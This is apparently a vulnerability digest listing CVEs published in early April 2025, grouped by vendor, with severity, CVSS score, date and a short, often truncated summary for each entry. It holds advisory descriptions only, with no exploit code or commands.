CVE-2025-2807 | High | 8.8 | — | 2025-04-08 | The Motors – Car Dealership & Classified Listings Plugin plugin for WordPress is vulnerable to arbitrary plugin installations due to a missing capability check in the mvl_setup_wizard_install_plugin() function in all versions up to, and in… |
CVE-2025-32654 | High | 8.1 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Stylemix Motors motors-car-dealership-classified-listings allows PHP Local File Inclusion.This issue affects Motors: f… |
CVE-2025-2128 | Medium | 6.5 | — | 2025-04-11 | The Cost Calculator Builder plugin for WordPress is vulnerable to time-based SQL Injection via the ‘order_ids’ parameter in all versions up to, and including, 3.2.67 due to insufficient escaping on the user supplied parameter and lack of s… |
CVE-2025-2808 | Medium | 5.4 | — | 2025-04-08 | The Motors – Car Dealership & Classified Listings Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Phone Number parameter in all versions up to, and including, 1.4.63 due to insufficient input sanitization a… |
CVE-2025-3437 | Medium | 4.3 | — | 2025-04-08 | The Motors – Car Dealership & Classified Listings Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in the ajax_actions.php file in all versions up to, and… |
Zoom · 5 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30671 | Medium | 6.5 | — | 2025-04-08 | Null pointer dereference in some Zoom Workplace Apps for Windows may allow an authenticated user to conduct a denial of service via network access. |
CVE-2025-30670 | Medium | 6.5 | — | 2025-04-08 | Null pointer dereference in some Zoom Workplace Apps for Windows may allow an authenticated user to conduct a denial of service via network access. |
CVE-2025-27442 | Medium | 4.6 | — | 2025-04-08 | Cross site scripting in some Zoom Workplace Apps may allow an unauthenticated user to conduct a loss of integrity via adjacent network access. |
CVE-2025-27441 | Medium | 4.6 | — | 2025-04-08 | Cross site scripting in some Zoom Workplace Apps may allow an unauthenticated user to conduct a loss of integrity via adjacent network access. |
CVE-2025-27443 | Low | 2.8 | — | 2025-04-08 | Insecure default variable initialization in some Zoom Workplace Apps for Windows may allow an authenticated user to conduct a loss of integrity via local access. |
Apache · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30473 | High | 8.8 | — | 2025-04-07 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Airflow Common SQL Provider. |
CVE-2025-27391 | Medium | 6.5 | — | 2025-04-09 | Insertion of Sensitive Information into Log File vulnerability in Apache ActiveMQ Artemis. |
CVE-2025-30677 | Medium | 6.5 | — | 2025-04-09 | Apache Pulsar contains multiple connectors for integrating with Apache Kafka. |
CVE-2025-31672 | Medium | 5.3 | — | 2025-04-09 | Improper Input Validation vulnerability in Apache POI. |
Arubanetworks · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-27083 | High | 7.2 | — | 2025-04-08 | Authenticated command injection vulnerabilities exist in the AOS-10 GW and AOS-8 Controller/Mobility Conductor web-based management interface. |
CVE-2025-27082 | High | 7.2 | — | 2025-04-08 | Arbitrary File Write vulnerabilities exist in the web-based management interface of both the AOS-10 GW and AOS-8 Controller/Mobility Conductor operating systems. |
CVE-2025-27084 | Medium | 5.4 | — | 2025-04-08 | A vulnerability in the Captive Portal of an AOS-10 GW and AOS-8 Controller/Mobility Conductor could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack. |
CVE-2025-27085 | Medium | 4.9 | — | 2025-04-08 | Multiple vulnerabilities exist in the web-based management interface of AOS-10 GW and AOS-8 Controller/Mobility Conductor. |
Fuzzoid · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3430 | Medium | 4.9 | — | 2025-04-08 | The 3DPrint Lite plugin for WordPress is vulnerable to SQL Injection via the 'printer_text' parameter in all versions up to, and including, 2.1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparat… |
CVE-2025-3429 | Medium | 4.9 | — | 2025-04-08 | The 3DPrint Lite plugin for WordPress is vulnerable to SQL Injection via the 'material_text' parameter in all versions up to, and including, 2.1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient prepara… |
CVE-2025-3428 | Medium | 4.9 | — | 2025-04-08 | The 3DPrint Lite plugin for WordPress is vulnerable to SQL Injection via the 'coating_text' parameter in all versions up to, and including, 2.1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparat… |
CVE-2025-3427 | Medium | 4.9 | — | 2025-04-08 | The 3DPrint Lite plugin for WordPress is vulnerable to SQL Injection via the 'infill_text' parameter in all versions up to, and including, 2.1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparati… |
Hgiga · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3363 | Critical | 9.8 | — | 2025-04-08 | The web service of iSherlock from HGiga has an OS Command Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary OS commands and execute them on the server. |
CVE-2025-3362 | Critical | 9.8 | — | 2025-04-08 | The web service of iSherlock from HGiga has an OS Command Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary OS commands and execute them on the server. |
CVE-2025-3361 | Critical | 9.8 | — | 2025-04-08 | The web service of iSherlock from HGiga has an OS Command Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary OS commands and execute them on the server. |
CVE-2025-3364 | Medium | 6.7 | — | 2025-04-08 | The SSH service of PowerStation from HGiga has a Chroot Escape vulnerability, allowing attackers with root privileges to bypass chroot restrictions and access the entire file system. |
Ibm · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2023-43037 | Medium | 6.5 | — | 2025-04-10 | IBM Maximo Application Suite 8.11 and 9.0 could allow an authenticated user to perform unauthorized actions due to improper input validation. |
CVE-2023-33844 | Medium | 5.4 | — | 2025-04-09 | IBM Security Verify Governance 10.0.2 is vulnerable to cross-site scripting. |
CVE-2025-25023 | Medium | 4.9 | — | 2025-04-09 | IBM Security Guardium 11.4 and 12.1 could allow a privileged user to read any file on the system due to incorrect privilege assignment. |
CVE-2024-51461 | Medium | 4.3 | — | 2025-04-11 | IBM QRadar WinCollect Agent 10.0 through 10.1.13 could allow a remote attacker to cause a denial of service by interrupting an HTTP request that could consume memory resources. |
Mediatek · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-20654 | Critical | 9.8 | — | 2025-04-07 | In wlan service, there is a possible out of bounds write due to an incorrect bounds check. |
CVE-2025-20664 | High | 7.5 | — | 2025-04-07 | In wlan AP driver, there is a possible information disclosure due to an uncaught exception. |
CVE-2025-20663 | High | 7.5 | — | 2025-04-07 | In wlan AP driver, there is a possible information disclosure due to an uncaught exception. |
CVE-2025-20659 | Medium | 6.5 | — | 2025-04-07 | In Modem, there is a possible system crash due to improper input validation. |
Ni · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2632 | High | 7.8 | — | 2025-04-09 | Out of bounds write vulnerability due to improper bounds checking in NI LabVIEW reading CPU info from cache that may result in information disclosure or arbitrary code execution. |
CVE-2025-2631 | High | 7.8 | — | 2025-04-09 | Out of bounds write vulnerability due to improper bounds checking in NI LabVIEW in InitCPUInformation() that may result in information disclosure or arbitrary code execution. |
CVE-2025-2630 | High | 7.3 | — | 2025-04-09 | There is a DLL hijacking vulnerability due to an uncontrolled search path that exists in NI LabVIEW. |
CVE-2025-2629 | High | 7.3 | — | 2025-04-09 | There is a DLL hijacking vulnerability due to an uncontrolled search path that exists in NI LabVIEW when loading NI Error Reporting. |
Nothings · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3409 | Medium | 6.3 | — | 2025-04-08 | A vulnerability classified as critical has been found in Nothings stb up to f056911. |
CVE-2025-3408 | Medium | 6.3 | — | 2025-04-08 | A vulnerability was found in Nothings stb up to f056911. |
CVE-2025-3407 | Medium | 6.3 | — | 2025-04-08 | A vulnerability was found in Nothings stb up to f056911. |
CVE-2025-3406 | Medium | 4.3 | — | 2025-04-08 | A vulnerability was found in Nothings stb up to f056911. |
Oisf · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-29915 | High | 7.5 | — | 2025-04-10 | Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. |
CVE-2025-29918 | Medium | 6.2 | — | 2025-04-10 | Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. |
CVE-2025-29917 | Medium | 6.2 | — | 2025-04-10 | Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. |
CVE-2025-29916 | Medium | 6.2 | — | 2025-04-10 | Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. |
Red Hat · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2251 | Medium | 6.2 | — | 2025-04-07 | A security flaw exists in WildFly and JBoss Enterprise Application Platform (EAP) within the Enterprise JavaBeans (EJB) remote invocation mechanism. |
CVE-2025-3359 | Medium | 6.2 | — | 2025-04-07 | A flaw was found in GNUPlot. |
CVE-2025-3416 | Low | 3.7 | — | 2025-04-08 | A flaw was found in OpenSSL's handling of the properties argument in certain functions. |
CVE-2025-3360 | Low | 3.7 | — | 2025-04-07 | A flaw was found in GLib. |
Adonesevangelista · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3337 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3336 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3335 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in codeprojects Online Restaurant Management System 1.0. |
Aias · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3412 | Medium | 6.3 | — | 2025-04-08 | A vulnerability, which was classified as critical, was found in mymagicpower AIAS 20250308. |
CVE-2025-3411 | Medium | 6.3 | — | 2025-04-08 | A vulnerability, which was classified as critical, has been found in mymagicpower AIAS 20250308. |
CVE-2025-3410 | Medium | 6.3 | — | 2025-04-08 | A vulnerability classified as critical was found in mymagicpower AIAS 20250308. |
Amauri · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31475 | Medium | 5.5 | — | 2025-04-07 | tarteaucitron.js is a compliant and accessible cookie banner. |
CVE-2025-31138 | Medium | 5.5 | — | 2025-04-07 | tarteaucitron.js is a compliant and accessible cookie banner. |
CVE-2025-31476 | Medium | 4.8 | — | 2025-04-07 | tarteaucitron.js is a compliant and accessible cookie banner. |
Brizy · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32198 | Medium | 6.5 | — | 2025-04-10 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in themefusecom Brizy brizy.This issue affects Brizy: from n/a through <= 2.7.7. |
CVE-2025-26902 | Medium | 4.3 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Brizy Brizy Pro allows Cross Site Request Forgery.This issue affects Brizy Pro: from n/a through 2.6.1. |
CVE-2025-26901 | Medium | 4.3 | — | 2025-04-09 | Missing Authorization vulnerability in Brizy Brizy Pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Brizy Pro: from n/a through 2.6.1. |
Debian · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-13861 | High | 7.8 | — | 2025-04-11 | A code injection vulnerability in the Debian package component of Taegis Endpoint Agent (Linux) versions older than 1.3.10 allows local users arbitrary code execution as root. |
CVE-2025-29769 | Medium | 5.5 | — | 2025-04-07 | libvips is a demand-driven, horizontally threaded image processing library. |
CVE-2025-32728 | Medium | 4.3 | — | 2025-04-10 | In sshd in OpenSSH before 10.0, the DisableForwarding directive does not adhere to the documentation stating that it disables X11 and agent forwarding. |
Drupal · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3475 | Medium | 6.5 | — | 2025-04-09 | Allocation of Resources Without Limits or Throttling, Incorrect Authorization vulnerability in Drupal WEB-T allows Excessive Allocation, Content Spoofing.This issue affects WEB-T: from 0.0.0 before 1.1.0. |
CVE-2025-3474 | Medium | 6.5 | — | 2025-04-09 | Missing Authentication for Critical Function vulnerability in Drupal Panels allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Panels: from 0.0.0 before 4.9.0. |
CVE-2025-3131 | Medium | 5.4 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Drupal ECA: Event - Condition - Action allows Cross Site Request Forgery.This issue affects ECA: Event - Condition - Action: from 0.0.0 before 1.1.12, from 2.0.0 before 2.0.16, from 2.1.0… |
Esafenet · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3401 | High | 7.3 | — | 2025-04-08 | A vulnerability has been found in ESAFENET CDG 5.6.3.154.205_20250114 and classified as critical. |
CVE-2025-3400 | High | 7.3 | — | 2025-04-08 | A vulnerability, which was classified as critical, was found in ESAFENET CDG 5.6.3.154.205_20250114. |
CVE-2025-3399 | High | 7.3 | — | 2025-04-08 | A vulnerability, which was classified as critical, has been found in ESAFENET CDG 5.6.3.154.205_20250114. |
Hive Support · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32242 | Medium | 6.5 | — | 2025-04-10 | Missing Authorization vulnerability in Hive Support Hive Support hive-support allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Hive Support: from n/a through <= 1.2.5. |
CVE-2025-32214 | Medium | 6.5 | — | 2025-04-10 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hive Support Hive Support hive-support allows Stored XSS.This issue affects Hive Support: from n/a through <= 1.2.11. |
CVE-2025-32208 | Medium | 6.5 | — | 2025-04-10 | Missing Authorization vulnerability in Hive Support Hive Support hive-support allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Hive Support: from n/a through <= 1.2.5. |
Iqonicdesign · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2526 | High | 8.8 | — | 2025-04-08 | The Streamit theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 4.0.2. |
CVE-2025-2525 | High | 8.8 | — | 2025-04-08 | The Streamit theme for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'st_Authentication_Controller::edit_profile' function in all versions up to, and including, 4.0.1. |
CVE-2025-2519 | Medium | 6.5 | — | 2025-04-08 | The Sreamit theme for WordPress is vulnerable to arbitrary file downloads in all versions up to, and including, 4.0.1. |
Philips · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3426 | — | — | — | 2025-04-07 | We observed that Intellispace Portal binaries doesn’t have any protection mechanisms to prevent reverse engineering. |
CVE-2025-3425 | — | — | — | 2025-04-07 | The IntelliSpace portal application utilizes .NET Remoting for its functionality. |
CVE-2025-3424 | — | — | — | 2025-04-07 | The IntelliSpace portal application utilizes .NET Remoting for its functionality. |
Pickplugins · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32144 | High | 8.8 | — | 2025-04-11 | Deserialization of Untrusted Data vulnerability in PickPlugins Job Board Manager job-board-manager allows Object Injection.This issue affects Job Board Manager: from n/a through <= 2.1.61. |
CVE-2025-32143 | High | 8.8 | — | 2025-04-11 | Deserialization of Untrusted Data vulnerability in PickPlugins Accordion accordions allows Object Injection.This issue affects Accordion: from n/a through <= 2.3.11. |
CVE-2025-32618 | High | 8.5 | — | 2025-04-11 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PickPlugins Wishlist wishlist allows SQL Injection.This issue affects Wishlist: from n/a through <= 1.0.46. |
Shopware · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30151 | High | 7.5 | — | 2025-04-08 | Shopware is an open commerce platform. |
CVE-2025-32378 | Medium | 5.3 | — | 2025-04-09 | Shopware is an open source e-commerce software platform. |
CVE-2025-30150 | Medium | 5.3 | — | 2025-04-08 | Shopware 6 is an open commerce platform based on Symfony Framework and Vue. |
Sonicwall · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-23010 | High | 7.2 | — | 2025-04-10 | An Improper Link Resolution Before File Access ('Link Following') vulnerability in SonicWall NetExtender Windows (32 and 64 bit) client which allows an attacker to manipulate file paths. |
CVE-2025-23009 | High | 7.2 | — | 2025-04-10 | A local privilege escalation vulnerability in SonicWall NetExtender Windows (32 and 64 bit) client which allows an attacker to trigger an arbitrary file deletion. |
CVE-2025-23008 | High | 7.2 | — | 2025-04-10 | An improper privilege management vulnerability in the SonicWall NetExtender Windows (32 and 64 bit) client allows a low privileged attacker to modify configurations. |
Wpeverest · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3439 | Critical | 9.8 | — | 2025-04-11 | The Everest Forms – Contact Form, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.1 via deserialization of untrusted input f… |
CVE-2025-3421 | Medium | 6.1 | — | 2025-04-11 | The Everest Forms – Contact Form, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'form_id' parameter in all versions up to, and including, 3.1.1 du… |
CVE-2025-3422 | Medium | 5.4 | — | 2025-04-11 | The The Everest Forms – Contact Form, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.1.1. |
Ability, Inc · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32650 | High | 8.5 | — | 2025-04-11 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ability, Inc Accessibility Suite online-accessibility allows SQL Injection.This issue affects Accessibility Suite: from n/a through <= 4… |
CVE-2025-32215 | Medium | 6.5 | — | 2025-04-10 | Unrestricted Upload of File with Dangerous Type vulnerability in Ability, Inc Accessibility Suite online-accessibility allows Stored XSS.This issue affects Accessibility Suite: from n/a through <= 4.18. |
Ashan Perera · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32614 | High | 8.8 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Ashan Perera EventON eventon-lite allows PHP Local File Inclusion.This issue affects EventON: from n/a through <= 2.4. |
CVE-2025-32160 | High | 7.5 | — | 2025-04-10 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Ashan Perera EventON eventon-lite.This issue affects EventON: from n/a through <= 2.4.1. |
Axis · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-0361 | Medium | 4.3 | — | 2025-04-08 | During an annual penetration test conducted on behalf of Axis Communications, Truesec discovered a flaw in the VAPIX Device Configuration framework that allowed for unauthenticated username enumeration through the VAPIX Device Configuratio… |
CVE-2024-47261 | Medium | 4.3 | — | 2025-04-08 | 51l3nc3, a member of the AXIS OS Bug Bounty Program, has found that the VAPIX API uploadoverlayimage.cgi did not have sufficient input validation to allow an attacker to upload files to block access to create image overlays in the web inte… |
Bep · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32025 | — | — | — | 2025-04-08 | bep/imagemeta is a Go library for reading EXIF, IPTC and XMP image meta data from JPEG, TIFF, PNG, and WebP files. |
CVE-2025-32024 | — | — | — | 2025-04-08 | bep/imagemeta is a Go library for reading EXIF, IPTC and XMP image meta data from JPEG, TIFF, PNG, and WebP files. |
Blubrry · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32690 | Medium | 6.5 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in blubrry PowerPress Podcasting powerpress allows DOM-Based XSS.This issue affects PowerPress Podcasting: from n/a through <= 11.12.5. |
CVE-2025-32691 | Medium | 4.9 | — | 2025-04-09 | Server-Side Request Forgery (SSRF) vulnerability in blubrry PowerPress Podcasting powerpress allows Server Side Request Forgery.This issue affects PowerPress Podcasting: from n/a through <= 11.12.6. |
Bogdan Bendziukov · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31002 | Critical | 9.1 | — | 2025-04-09 | Unrestricted Upload of File with Dangerous Type vulnerability in Bogdan Bendziukov Squeeze squeeze allows Using Malicious Files.This issue affects Squeeze: from n/a through <= 1.6. |
CVE-2025-31003 | Low | 2.7 | — | 2025-04-09 | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Bogdan Bendziukov Squeeze squeeze allows Retrieve Embedded Sensitive Data.This issue affects Squeeze: from n/a through <= 1.6. |
Codeastro · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-29017 | High | 8.8 | — | 2025-04-10 | A Remote Code Execution (RCE) vulnerability exists in Code Astro Internet Banking System 2.0.0 due to improper file upload validation in the profile_pic parameter within pages_view_client.php. |
CVE-2025-29018 | Medium | 4.8 | — | 2025-04-09 | A Stored Cross-Site Scripting (XSS) vulnerability exists in the name parameter of pages_add_acc_type.php in Code Astro Internet Banking System 2.0.0. |
Dev02ali · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32567 | High | 8.5 | — | 2025-04-11 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in dev02ali Easy Post Duplicator easy-post-duplicator allows SQL Injection.This issue affects Easy Post Duplicator: from n/a through <= 1.0… |
CVE-2025-32538 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dev02ali Easy Post Duplicator easy-post-duplicator allows Reflected XSS.This issue affects Easy Post Duplicator: from n/a through <= 1.0… |
Helm · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32387 | Medium | 6.5 | — | 2025-04-09 | Helm is a package manager for Charts for Kubernetes. |
CVE-2025-32386 | Medium | 6.5 | — | 2025-04-09 | Helm is a tool for managing Charts. |
Hewlett Packard Enterprise (Hpe) · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-27078 | Medium | 6.5 | — | 2025-04-08 | A vulnerability in a system binary of AOS-8 Instant and AOS-10 AP could allow an authenticated remote attacker to inject commands into the underlying operating system while using the CLI. |
CVE-2025-27079 | Medium | 6.0 | — | 2025-04-08 | A vulnerability in the file creation process on the command line interface of AOS-8 Instant and AOS-10 AP could allow an authenticated remote attacker to perform remote code execution (RCE). |
Iteaj · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3327 | Low | 3.5 | — | 2025-04-07 | A vulnerability was found in iteaj iboot 物联网网关 1.1.3 and classified as problematic. |
CVE-2025-3326 | Low | 3.5 | — | 2025-04-07 | A vulnerability has been found in iteaj iboot 物联网网关 1.1.3 and classified as problematic. |
Jenkins · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32755 | Critical | 9.1 | — | 2025-04-10 | In jenkins/ssh-slave Docker images based on Debian, SSH host keys are generated on image creation for images based on Debian, causing all containers based on images of the same version use the same SSH host keys, allowing attackers able to… |
CVE-2025-32754 | Critical | 9.1 | — | 2025-04-10 | In jenkins/ssh-agent Docker images 6.11.1 and earlier, SSH host keys are generated on image creation for images based on Debian, causing all containers based on images of the same version use the same SSH host keys, allowing attackers able… |
Joe · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32495 | Medium | 6.5 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Joe Waymark waymark allows Stored XSS.This issue affects Waymark: from n/a through <= 1.5.3. |
CVE-2025-32487 | Medium | 4.9 | — | 2025-04-09 | Server-Side Request Forgery (SSRF) vulnerability in Joe Waymark waymark allows Server Side Request Forgery.This issue affects Waymark: from n/a through <= 1.5.2. |
Joomla · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-25226 | Critical | 9.8 | — | 2025-04-08 | Improper handling of identifiers lead to a SQL injection vulnerability in the quoteNameStr method of the database package. |
CVE-2025-25227 | High | 7.5 | — | 2025-04-08 | Insufficient state checks lead to a vector that allows to bypass 2FA checks. |
Linzhaoguan · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3386 | Low | 2.4 | — | 2025-04-07 | A vulnerability was found in LinZhaoguan pb-cms 2.0. |
CVE-2025-3385 | Low | 2.4 | — | 2025-04-07 | A vulnerability was found in LinZhaoguan pb-cms 2.0. |
Magepeopleteam · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32607 | Critical | 9.8 | — | 2025-04-11 | Deserialization of Untrusted Data vulnerability in magepeopleteam WpBookingly service-booking-manager allows Object Injection.This issue affects WpBookingly: from n/a through <= 1.3.0. |
CVE-2025-32145 | High | 8.8 | — | 2025-04-10 | Deserialization of Untrusted Data vulnerability in magepeopleteam WpEvently mage-eventpress allows Object Injection.This issue affects WpEvently: from n/a through <= 4.3.6. |
Magnigenie · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32687 | High | 8.5 | — | 2025-04-10 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Magnigenie Review Stars Count For WooCommerce review-stars-count-for-woocommerce allows SQL Injection.This issue affects Review Stars Cou… |
CVE-2025-32553 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Magnigenie RestroPress restropress allows Reflected XSS.This issue affects RestroPress: from n/a through <= 3.2.8.4. |
Msi · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-27813 | High | 8.1 | — | 2025-04-10 | MSI Center before 2.0.52.0 has Missing PE Signature Validation. |
CVE-2025-27812 | High | 8.1 | — | 2025-04-10 | MSI Center before 2.0.52.0 allows TOCTOU Local Privilege Escalation. |
Ngothang · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-6860 | Medium | 4.3 | — | 2025-04-09 | The WP MultiTasking WordPress plugin through 0.1.12 does not have CSRF check when updating its permalink suffix settings, which could allow attackers to make logged admins perform such action via a CSRF attack |
CVE-2024-6857 | Medium | 4.3 | — | 2025-04-09 | The WP MultiTasking WordPress plugin through 0.1.12 does not have CSRF check when updating its Header, Footer and Body Script Settings, which could allow attackers to make logged admins perform such action via a CSRF attack |
Open, Inc. · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31932 | High | 8.8 | — | 2025-04-11 | Deserialization of untrusted data issue exists in BizRobo! |
CVE-2025-31362 | Low | 3.7 | — | 2025-04-11 | Use of hard-coded cryptographic key issue exists in BizRobo! |
Otwthemes · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32115 | High | 7.1 | — | 2025-04-10 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in OTWthemes Popping Content Light popping-content-light allows Reflected XSS.This issue affects Popping Content Light: from n/a through <=… |
CVE-2025-32117 | High | 7.1 | — | 2025-04-08 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in OTWthemes Widgetize Pages Light widgetize-pages-light allows Reflected XSS.This issue affects Widgetize Pages Light: from n/a through <=… |
Quantumcloud · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32675 | Medium | 6.8 | — | 2025-04-09 | Server-Side Request Forgery (SSRF) vulnerability in QuantumCloud SEO Help seo-help allows Server Side Request Forgery.This issue affects SEO Help: from n/a through <= 6.7.9. |
CVE-2025-32244 | Medium | 6.5 | — | 2025-04-10 | Missing Authorization vulnerability in QuantumCloud SEO Help seo-help allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SEO Help: from n/a through <= 6.7.9. |
Romancode · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32683 | Medium | 6.5 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RomanCode MapSVG mapsvg-lite-interactive-vector-maps allows DOM-Based XSS.This issue affects MapSVG: from n/a through <= 8.6.6. |
